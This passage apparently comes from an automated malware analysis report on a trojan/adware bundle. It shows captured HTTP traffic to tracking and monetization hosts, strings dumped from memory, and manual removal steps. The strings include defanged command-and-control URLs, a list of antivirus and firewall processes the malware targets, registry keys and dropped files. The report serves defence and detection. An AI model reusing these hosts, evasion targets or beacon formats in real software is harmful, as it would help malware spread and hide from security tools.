    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293488"
    Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
    Cache-Control: max-age=117
    Content-Length: 1075
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
    ....



    GET /plugins/mins/263.js?ver=2&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293476"
    Last-Modified: Sun, 21 Sep 2014 09:57:56 GMT
    Cache-Control: max-age=381
    Content-Length: 1075
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
    ....



    GET /plugins/mins/233.js?ver=7&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273128"
    Last-Modified: Sun, 17 Aug 2014 10:58:48 GMT
    Cache-Control: max-age=900
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds065.am4.c
    ....



    GET /plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405929866"
    Last-Modified: Mon, 21 Jul 2014 08:04:26 GMT
    Cache-Control: max-age=900
    Content-Length: 508
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
    appAPI.internal.monetization = appAPI.internal.monetization || {};.if 
    (typeof appAPI.internal.monetization.plugins === "undefined") { appAPI
    .internal.monetization.plugins = {}; }..appAPI.internal.monetization.p
    lugins[226] = function() {..if (appAPI.internal.monetization.loader &&
    appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.
    monetization.getCampaignId) {...if (appAPI.internal.monetization.getCa
    mpaignId() == 0) {....appAPI.internal.monetization.loader.setCampaignI
    d(1026);...}..}.};
    ....



    GET /plugins/mins/221.js?ver=4&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404650838"
    Last-Modified: Sun, 06 Jul 2014 12:47:18 GMT
    Cache-Control: max-age=900
    Content-Length: 413
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[221]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(221,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"DOWNLOADS"}))();};

    ....



    GET /plugins/mins/195.js?ver=28&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404650834"
    Last-Modified: Sun, 06 Jul 2014 12:47:14 GMT
    Cache-Control: max-age=900
    Content-Length: 408
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[195]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(195,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"LITE"}))();};
    ....



    GET /plugins/mins/192.js?ver=9&rnd=8467 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273151"
    Last-Modified: Sun, 17 Aug 2014 10:59:11 GMT
    Cache-Control: max-age=900
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
    ....



    GET /plugins/mins/180.js?ver=12&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405846499"
    Last-Modified: Sun, 20 Jul 2014 08:54:59 GMT
    Cache-Control: max-age=630
    Content-Length: 1383
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
    ....

    <<< skipped >>>

    GET /plugins/mins/102.js?ver=10&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405241400"
    Last-Modified: Sun, 13 Jul 2014 08:50:00 GMT
    Cache-Control: max-age=900
    Content-Length: 1047
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c



    GET /plugins/mins/91.js?ver=85&rnd=6334 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1413792022"
    Last-Modified: Mon, 20 Oct 2014 08:00:22 GMT
    Cache-Control: max-age=586
    Content-Length: 182280
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c

    <<< skipped >>>

    GET /stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 HTTP/1.1
    Accept: */*
    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: zLFW5JNHHsEzn3gsP6/gWOmvbfdsRf6fkxH80jtB0EM9V3Bc5dmd00PwXCXPANXu
    x-amz-request-id: C4261FADE2887ED2
    Date: Tue, 21 Oct 2014 03:33:55 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:43 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793 HTTP/1.1
    Accept: */*
    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: 41WsFdMcUxxYd8P8u1KxQOL8X SkUplRhAHoeylsnadbFr6Bv/KrZSxPD6ObRUqE
    x-amz-request-id: 1369AB04FE01EB82
    Date: Tue, 21 Oct 2014 03:33:59 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    The Trojan connects to the servers at the following location(s):

    3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852:

    .text
    `.rdata
    @.data
    .rsrc
    @.reloc
    function not supported
    operation canceled
    address_family_not_supported
    operation_in_progress
    operation_not_supported
    protocol_not_supported
    operation_would_block
    address family not supported
    broken pipe
    inappropriate io control operation
    not supported
    operation in progress
    operation not permitted
    operation not supported
    operation would block
    protocol not supported
    operator
    GetProcessWindowStation
    InternetCrackUrlW
    HttpOpenRequestW
    HttpSendRequestW
    HttpQueryInfoW
    WININET.dll
    KERNEL32.dll
    SHELL32.dll
    ole32.dll
    GetProcessHeap
    GetCPInfo
    <requestedExecutionLevel level='asInvoker' uiAccess='false' />
    0)0>1\1~1
    Amscoree.dll
    - CRT not initialized
    - Attempt to initialize the CRT more than once.
    - floating point support not loaded
    kernel32.dll
    USER32.DLL
    AF2.exe
    AF1.exe
    AF1.exe -d
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe
    hXXp://errors.clientstaticserv.com/utility.gif?action=installation&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&app=54246&srcid=001359&error=af&rnd=1413862412&result=

    3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852_rwx_003E0000_00002000:

    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text

    3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852_rwx_003F0000_00001000:

    |3a2f274a-d35f-47ab-8ca2-11bebfe38097.exeM_852_

    Explorer.EXE_1684_rwx_00EE0000_00002000:

    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text

    Explorer.EXE_1684_rwx_00EF0000_00001000:

    |explorer.exeM_1684_

    Explorer.EXE_1684_rwx_038D0000_0108E000:

    c:\windows
    hXXp://cades.com.ar/images/logo.gif
    hXXp://ceviztv.com/images/logo.gif
    hXXp://thai-skylight.com/button.gif
    hXXp://coresdabahia.com/images/logo.gif
    hXXp://smokin-tr.com/assets/images/logo.gif
    hXXp://VVV.buergerfest-graefenberg.de/logo.gif
    hXXp://wingmakershope.za.pl/images/button.gif
    hXXp://wellssmall.com/images/logo.gif
    hXXp://VVV.uehsi.de/logo.gif
    hXXp://hotelispb.hop.ru/image/logo.gif
    %System%\drivers\ijlqln.sys
    14067185087
    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text
    hXXp://89.119.67.154/testo5/
    hXXp://kukutrustnet777.info/home.gif
    hXXp://kukutrustnet888.info/home.gif
    hXXp://kukutrustnet987.info/home.gif
    KERNEL32.dll
    USER32.dll
    h.rdata
    H.data
    .reloc
    ntoskrnl.exe
    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
    Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
    Software\Microsoft\Windows\CurrentVersion\Internet Settings
    Software\Microsoft\Windows\CurrentVersion
    hXXp://VVV.klkjwre9fqwieluoi.info/
    hXXp://kukutrustnet777888.info/
    Software\Microsoft\Windows\CurrentVersion\policies\system
    Software\Microsoft\Windows\ShellNoRoam\MUICache
    %s:*:Enabled:ipsec
    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    GdiPlus.dll
    hXXp://
    ipfltdrv.sys
    VVV.microsoft.com
    ?%x=%d
    &%x=%d
    SYSTEM.INI
    USER32.DLL
    .%c%s
    \\.\amsint32
    NTDLL.DLL
    autorun.inf
    ADVAPI32.DLL
    win%s.exe
    %s.exe
    WININET.DLL
    InternetOpenUrlA
    avast! Web Scanner
    Avira AntiVir Premium WebGuard
    cmdGuard
    cmdAgent
    Eset HTTP Server
    ProtoPort Firewall service
    SpIDer FS Monitor for Windows NT
    Symantec Password Validation
    WebrootDesktopFirewallDataService
    WebrootFirewall
    %d%d.tmp
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
    %s\%s
    %s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
    Software\Microsoft\Windows\CurrentVersion\Ext\Stats
    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
    Explorer.exe
    A2CMD.
    ASHWEBSV.
    AVGCC.AVGCHSVX.
    DRWEB
    DWEBLLIO
    DWEBIO
    FSGUIEXE.
    MCVSSHLD.
    NPFMSG.
    SYMSPORT.
    WEBSCANX.
    .adata
    M_%d_
    %c%d_%d
    ?456789:;<=
    !"#$%&'()* ,-./0123
    GetProcessHeap
    GetWindowsDirectoryA
    RegEnumKeyExA
    RegDeleteKeyA
    RegOpenKeyExA
    RegCreateKeyA
    RegCloseKey
    SHFileOperationA
    &3&3&3&389
    .rdata
    .data
    Bkrnl.exe?
    = =$=(=,=
    322%2`.50728)
    .klkjw:9fqwi
    FamXf39.sys
    .pBTa8
    %s:*:
    Bg.laXV
    &?%x=
    GUrlA'
    Web%w|nc
    HTTP)
    2GUARDCMD.
    .ENHCDM
    PL/KPCKwWEB
    MM.PFW.
    .bssf
    J:CRT
    ADVAPI32.dll
    MSVCRT.dll
    SHELL32.dll
    WS2_32.dll


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      GoogleUpdate.exe:2460
      GoogleUpdate.exe:756
      GoogleUpdate.exe:2652
      GoogleUpdate.exe:2296
      GoogleUpdate.exe:1288
      GoogleUpdate.exe:2364
      GoogleUpdate.exe:2356
      772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
      Iufkopcpdfjpcg.exe:424
      MPlayerplus_01-bg.exe:2776
      772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
      %original file name%.exe:688
      regsvr32.exe:2736
      dwwin.exe:3088
      MPlayerplus_01-codedownloader.exe:2344
      MPlayerplus_01-codedownloader.exe:2224
      772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848

    2. Delete the original Trojan file.
    3. Delete or disinfect the following files created/modified by the Trojan:

      %Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (54 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (898 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (894 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (56 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)

    4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
    6. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.
